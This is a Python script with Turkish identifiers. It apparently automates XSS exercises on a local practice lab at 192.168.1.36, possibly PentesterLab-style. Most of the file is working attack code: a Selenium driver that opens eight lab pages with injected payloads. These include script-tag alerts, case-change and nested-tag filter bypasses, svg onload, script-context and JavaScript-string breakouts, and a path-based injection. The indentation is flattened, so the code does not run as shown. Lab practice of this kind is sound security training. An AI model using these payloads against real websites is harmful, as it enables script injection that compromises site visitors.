//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Python:
import requests
from selenium import webdriver
import time
import urllib.parse
from bs4 import BeautifulSoup
def sitenin_çıktısını_düzelt(site):
a = BeautifulSoup(requests.get(site).text,'html.parser').find_all("div",{"class":"container"})
b = str(a[1]).replace('<div class="container">\n\n\n\n','').split("<footer>")
print(b[0])
def url_encode(deger):
return urllib.parse.quote(deger)
def büyült(deger,değişken):
return str(değişken.replace(deger,str(deger).upper()))
payloads = ["function deger(kod){return kod;}deger('<script>alert('xss')</script>')",
"<script>alert('xss')</script>",
"<scri<script>pt>alert('xss')</sc</script>ript>",
"<svg onload=alert('xss')"]
#--------------------
def example1():
kod = "<script>alert('xss')</script>"
site = "http://192.168.1.36/xss/example1.php?name=hacker"
browser = webdriver.Firefox()
browser.get(site+kod)
time.sleep(3)
browser.quit()
#----------------------
def example2():
kod = "<script>alert('xss')</script>"
site = "http://192.168.1.36/xss/example2.php?name=hacker"
browser = webdriver.Firefox()
browser.get(site + büyült("script",kod))
time.sleep(2)
browser.quit()
#-----------------------
def example3():
example3_site = "http://192.168.1.36/xss/example3.php?name=hacker"
kod = "<scri<script>pt>alert('xss')</sc</script>ript>"
browser = webdriver.Firefox()
browser.get(example3_site + kod)
time.sleep(3)
browser.quit()
#-----------------------
def example4():
example4_site = "http://192.168.1.36/xss/example4.php?name=hacker"
kod = "<svg onload=alert('xss')"
browser = webdriver.Firefox()
browser.get(example4_site+kod)
time.sleep(3)
browser.quit()
#-----------------------
def example5():
example5_site = 'http://192.168.1.36/xss/example5.php?name=hacker'
kod = "<script>prompt('xss')</script>"
browser = webdriver.Firefox()
browser.get(example5_site+kod)
time.sleep(3)
browser.quit()
#-----------------------
def example6():
example6_site = 'http://192.168.1.36/xss/example6.php?name=hacker'
kod = '"</script><script>alert("xss")</script>//'
browser = webdriver.Firefox()
browser.get(example6_site + kod)
time.sleep(3)
browser.quit()
def example7():
example7_site = 'http://192.168.1.36/xss/example7.php?name=hacker'
kod = "';alert('xss')//"
browser = webdriver.Firefox()
browser.get(example7_site + kod)
time.sleep(3)
browser.quit()
def example8():
example8_site = 'http://192.168.1.36/xss/example8.php'
kod = '/"><script>alert("xss")</script>'
browser = webdriver.Firefox()
browser.get(example8_site + kod)
time.sleep(3)
browser.quit()
example1()
example2()
example3()
example4()
example5()
example6()
example7()
example8()